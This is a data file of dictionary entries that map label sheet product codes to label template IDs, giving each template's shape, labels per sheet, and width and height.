{'J8366': {'id': 'LP6/99', 'shape': 'rectangle', 'number': 6, 'width': 99.1, 'height': 93.1}},
{'J8367': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'J8368': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'J8368': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'J8369': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'J8371': {'id': 'LP4/200', 'shape': 'rectangle', 'number': 4, 'width': 200, 'height': 60}},
{'J8551': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'J8559': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'J8560': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'J8562': {'id': 'LP16/99', 'shape': 'rectangle', 'number': 16, 'width': 99.1, 'height': 34}},
{'J8563': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'J8565': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'J8565': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'J8567': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J8567': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J8567': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J8570': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'J8587': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J8587': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J8587': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J8651': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'J8654': {'id': 'LP40/45', 'shape': 'rectangle', 'number': 40, 'width': 45.7, 'height': 25.4}},
{'J8655': {'id': 'LP12/89', 'shape': 'round_rectangle', 'number': 12, 'width': 89, 'height': 42}},
{'J8656': {'id': 'LP84/46', 'shape': 'rectangle', 'number': 84, 'width': 46, 'height': 11.1}},
{'J8657': {'id': 'LP84/46', 'shape': 'rectangle', 'number': 84, 'width': 46, 'height': 11.1}},
{'J8658': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'J8659': {'id': 'LP270/18', 'shape': 'rectangle', 'number': 270, 'width': 17.8, 'height': 10}},
{'J8660': {'id': 'LPCD116', 'shape': 'circle', 'number': 2, 'width': 116, 'height': 116}},
{'J8666': {'id': 'LP10/70', 'shape': 'rectangle', 'number': 10, 'width': 70, 'height': 52}},
{'J8671': {'id': 'LP12/76', 'shape': 'rectangle', 'number': 12, 'width': 76.2, 'height': 46.4}},
{'J8674': {'id': 'LP16/145', 'shape': 'rectangle', 'number': 16, 'width': 145, 'height': 17}},
{'J8676': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'J8743': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'J8751': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'J8756V': {'id': 'LP84/46', 'shape': 'rectangle', 'number': 84, 'width': 46, 'height': 11.1}},
{'J8766': {'id': 'LP10/70', 'shape': 'rectangle', 'number': 10, 'width': 70, 'height': 52}},
{'J8770': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'J8771': {'id': 'LP12/76', 'shape': 'rectangle', 'number': 12, 'width': 76.2, 'height': 46.4}},
{'J8774': {'id': 'LP16/145', 'shape': 'rectangle', 'number': 16, 'width': 145, 'height': 17}},
{'J8776': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'J8777': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'J8778': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L3415': {'id': 'LP24/40R', 'shape': 'circle', 'number': 24, 'width': 40, 'height': 40}},
{'L4730': {'id': 'LP270/18', 'shape': 'rectangle', 'number': 270, 'width': 17.8, 'height': 10}},
{'L4731': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'L4733': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'L4734': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L4734': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L4735': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L4735': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L4735': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L4736': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L4737': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'L4743': {'id': 'LP12/99', 'shape': 'rectangle', 'number': 12, 'width': 99.1, 'height': 42.3}},
{'L4744': {'id': 'LP10/96', 'shape': 'rectangle', 'number': 10, 'width': 96, 'height': 50.8}},
{'L4760': {'id': 'LP7/192', 'shape': 'rectangle', 'number': 7, 'width': 192, 'height': 39}},
{'L4761': {'id': 'LP4/192', 'shape': 'rectangle', 'number': 4, 'width': 192, 'height': 62}},
{'L4762': {'id': 'LP7/192', 'shape': 'rectangle', 'number': 7, 'width': 192, 'height': 39}},
{'L4763': {'id': 'LP7/192', 'shape': 'rectangle', 'number': 7, 'width': 192, 'height': 39}},
{'L4764': {'id': 'LP7/192', 'shape': 'rectangle', 'number': 7, 'width': 192, 'height': 39}},
{'L4765': {'id': 'LP7/192', 'shape': 'rectangle', 'number': 7, 'width': 192, 'height': 39}},
{'L4770': {'id': 'LP40/45', 'shape': 'rectangle', 'number': 40, 'width': 45.7, 'height': 25.4}},
{'L4772': {'id': 'LP12/99', 'shape': 'rectangle', 'number': 12, 'width': 99.1, 'height': 42.3}},
{'L4773': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L4774': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'L4775': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L4775': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L4775': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L4776': {'id': 'LP12/99', 'shape': 'rectangle', 'number': 12, 'width': 99.1, 'height': 42.3}},
{'L4778': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L4784': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'L4790': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L4791': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L4792': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L4793': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L5103': {'id': 'LP10/38', 'shape': 'rectangle', 'number': 10, 'width': 38, 'height': 135}},
{'L6003': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'L6004': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'L6005': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6005': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6005': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6006': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6006': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6006': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6007': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6007': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6007': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6008': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'L6009': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L6011': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'L6012': {'id': 'LP10/96', 'shape': 'rectangle', 'number': 10, 'width': 96, 'height': 50.8}},
{'L6013': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6013': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6013': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6015': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L6023': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'L6025': {'id': 'LP18/63', 'shape': 'rectangle', 'number': 18, 'width': 45.7, 'height': 46.6}},
{'L6032': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L6033': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L6034': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L6035': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L6036': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'L6037': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'L6038': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L6039': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L6040': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L6041': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L6043': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L6044': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L6045': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L6046': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L6047': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L6048': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'L6049': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'L6050': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L6050': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L6051': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L6051': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L6052': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L6052': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L6053': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L6053': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L6054': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L6055': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L6056': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L6057': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L6103': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L6105': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'L6111': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6111': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6111': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6112': {'id': 'LP24/40R', 'shape': 'circle', 'number': 24, 'width': 40, 'height': 40}},
{'L6113': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L6114': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'L6117': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L6140': {'id': 'LP40/45', 'shape': 'rectangle', 'number': 40, 'width': 45.7, 'height': 25.4}},
{'L6141': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L6145': {'id': 'LP40/45', 'shape': 'rectangle', 'number': 40, 'width': 45.7, 'height': 25.4}},
{'L6146': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L7051': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L7060': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'L7063': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7065': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L7068': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L7068': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L7069': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'L7074': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'L7077': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'L7084': {'id': 'LP84/46', 'shape': 'rectangle', 'number': 84, 'width': 46, 'height': 11.1}},
{'L7102': {'id': 'LP7/192', 'shape': 'rectangle', 'number': 7, 'width': 192, 'height': 39}},
{'L7159': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L7159X': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L7160': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'L7160X': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'L7161': {'id': 'LP18/63', 'shape': 'rectangle', 'number': 18, 'width': 45.7, 'height': 46.6}},
{'L7161X': {'id': 'LP18/63', 'shape': 'rectangle', 'number': 18, 'width': 45.7, 'height': 46.6}},
{'L7162': {'id': 'LP16/99', 'shape': 'rectangle', 'number': 16, 'width': 99.1, 'height': 34}},
{'L7162X': {'id': 'LP16/99', 'shape': 'rectangle', 'number': 16, 'width': 99.1, 'height': 34}},
{'L7163B': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7163': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7163R': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7163X': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7163Y': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7164': {'id': 'LP12/63', 'shape': 'rectangle', 'number': 12, 'width': 45.7, 'height': 72}},
{'L7165': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'L7165': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'L7165X': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'L7165X': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'L7166': {'id': 'LP6/99', 'shape': 'rectangle', 'number': 6, 'width': 99.1, 'height': 93.1}},
{'L7166X': {'id': 'LP6/99', 'shape': 'rectangle', 'number': 6, 'width': 99.1, 'height': 93.1}},
{'L7167': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'L7168': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L7168': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L7169': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'L7170': {'id': 'LP24/134', 'shape': 'rectangle', 'number': 24, 'width': 134, 'height': 11}},
{'L7171A': {'id': 'LP4/200', 'shape': 'rectangle', 'number': 4, 'width': 200, 'height': 60}},
{'L7171B': {'id': 'LP4/200', 'shape': 'rectangle', 'number': 4, 'width': 200, 'height': 60}},
{'L7171G': {'id': 'LP4/200', 'shape': 'rectangle', 'number': 4, 'width': 200, 'height': 60}},
{'L7171': {'id': 'LP4/200', 'shape': 'rectangle', 'number': 4, 'width': 200, 'height': 60}},
{'L7171R': {'id': 'LP4/200', 'shape': 'rectangle', 'number': 4, 'width': 200, 'height': 60}},
{'L7171Y': {'id': 'LP4/200', 'shape': 'rectangle', 'number': 4, 'width': 200, 'height': 60}},
{'L7172': {'id': 'LP18/100', 'shape': 'rectangle', 'number': 18, 'width': 100, 'height': 30}},
{'L7173B': {'id': 'LP10/95OV', 'shape': 'oval', 'number': 10, 'width': 95, 'height': 53}},
{'L7173B': {'id': 'LP10/99', 'shape': 'rectangle', 'number': 10, 'width': 99.1, 'height': 57}},
{'L7173': {'id': 'LP10/95OV', 'shape': 'oval', 'number': 10, 'width': 95, 'height': 53}},
{'L7173': {'id': 'LP10/99', 'shape': 'rectangle', 'number': 10, 'width': 99.1, 'height': 57}},
{'L7173X': {'id': 'LP10/95OV', 'shape': 'oval', 'number': 10, 'width': 95, 'height': 53}},
{'L7173X': {'id': 'LP10/99', 'shape': 'rectangle', 'number': 10, 'width': 99.1, 'height': 57}},
{'L7177': {'id': 'LP12/99', 'shape': 'rectangle', 'number': 12, 'width': 99.1, 'height': 42.3}},
{'L7263': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7263R': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7263Y': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7363P': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7409': {'id': 'LP51/57', 'shape': 'rectangle', 'number': 51, 'width': 57, 'height': 15}},
{'L7551': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L7556': {'id': 'LP84/46', 'shape': 'rectangle', 'number': 84, 'width': 46, 'height': 11.1}},
{'L7559': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L7560': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'L7562': {'id': 'LP16/99', 'shape': 'rectangle', 'number': 16, 'width': 99.1, 'height': 34}},
{'L7563': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7565': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'L7565': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'L7567': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7567': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7567': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7568': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7568': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7568': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7568': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L7568': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L7630': {'id': 'LP12/64R', 'shape': 'circle', 'number': 12, 'width': 63.5, 'height': 63.5}},
{'L7636': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L7644': {'id': 'LP9/133', 'shape': 'rectangle', 'number': 9, 'width': 133, 'height': 29.6}},
{'L7650': {'id': 'LP12/64R', 'shape': 'circle', 'number': 12, 'width': 63.5, 'height': 63.5}},
{'L7651': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L7651P': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L7651Y': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L7654': {'id': 'LP40/45', 'shape': 'rectangle', 'number': 40, 'width': 45.7, 'height': 25.4}},
{'L7655': {'id': 'LP12/89', 'shape': 'round_rectangle', 'number': 12, 'width': 89, 'height': 42}},
{'L7656': {'id': 'LP84/46', 'shape': 'rectangle', 'number': 84, 'width': 46, 'height': 11.1}},
{'L7657': {'id': 'LP270/18', 'shape': 'rectangle', 'number': 270, 'width': 17.8, 'height': 10}},
{'L7658': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'L7660': {'id': 'LPCD116', 'shape': 'circle', 'number': 2, 'width': 116, 'height': 116}},
{'L7664': {'id': 'LP8/71', 'shape': 'rectangle', 'number': 8, 'width': 71, 'height': 70}},
{'L7665': {'id': 'LP24/72', 'shape': 'rectangle', 'number': 24, 'width': 72, 'height': 21.11}},
{'L7666': {'id': 'LP10/70', 'shape': 'rectangle', 'number': 10, 'width': 70, 'height': 52}},
{'L7667': {'id': 'LP9/133', 'shape': 'rectangle', 'number': 9, 'width': 133, 'height': 29.6}},
{'L7668': {'id': 'LP15/59', 'shape': 'rectangle', 'number': 15, 'width': 59, 'height': 51}},
{'L7670': {'id': 'LP12/64R', 'shape': 'circle', 'number': 12, 'width': 63.5, 'height': 63.5}},
{'L7670R': {'id': 'LP12/64R', 'shape': 'circle', 'number': 12, 'width': 63.5, 'height': 63.5}},
{'L7670Y': {'id': 'LP12/64R', 'shape': 'circle', 'number': 12, 'width': 63.5, 'height': 63.5}},
{'L7671': {'id': 'LP12/76', 'shape': 'rectangle', 'number': 12, 'width': 76.2, 'height': 46.4}},
{'L7674': {'id': 'LP16/145', 'shape': 'rectangle', 'number': 16, 'width': 145, 'height': 17}},
{'L7676': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L7678': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L7680': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L7690': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L7701': {'id': 'LP4/192', 'shape': 'rectangle', 'number': 4, 'width': 192, 'height': 62}},
{'L7760': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L7765': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'L7765': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'L7768': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L7768': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L7769': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'L7776': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L7780': {'id': 'LP24/40R', 'shape': 'circle', 'number': 24, 'width': 40, 'height': 40}},
{'L7781': {'id': 'LP40/45', 'shape': 'rectangle', 'number': 40, 'width': 45.7, 'height': 25.4}},
{'L7782': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'L7783': {'id': 'LP10/96', 'shape': 'rectangle', 'number': 10, 'width': 96, 'height': 50.8}},
{'L7784': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7784': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7784': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7860': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L7960': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'L7962': {'id': 'LP16/99', 'shape': 'rectangle', 'number': 16, 'width': 99.1, 'height': 34}},
{'L7963': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7965': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'L7965': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'L7966': {'id': 'LP6/99', 'shape': 'rectangle', 'number': 6, 'width': 99.1, 'height': 93.1}},
{'L7973': {'id': 'LP10/95OV', 'shape': 'oval', 'number': 10, 'width': 95, 'height': 53}},
{'L7973': {'id': 'LP10/99', 'shape': 'rectangle', 'number': 10, 'width': 99.1, 'height': 57}},
{'L7990': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'L7990': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'L7990R': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'L7990R': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'L7992': {'id': 'LP10/95OV', 'shape': 'oval', 'number': 10, 'width': 95, 'height': 53}},
{'L7992': {'id': 'LP10/99', 'shape': 'rectangle', 'number': 10, 'width': 99.1, 'height': 57}},
{'L7993': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'L7993': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'L7994': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'L7995': {'id': 'LP6/99', 'shape': 'rectangle', 'number': 6, 'width': 99.1, 'height': 93.1}},
{'L7996': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
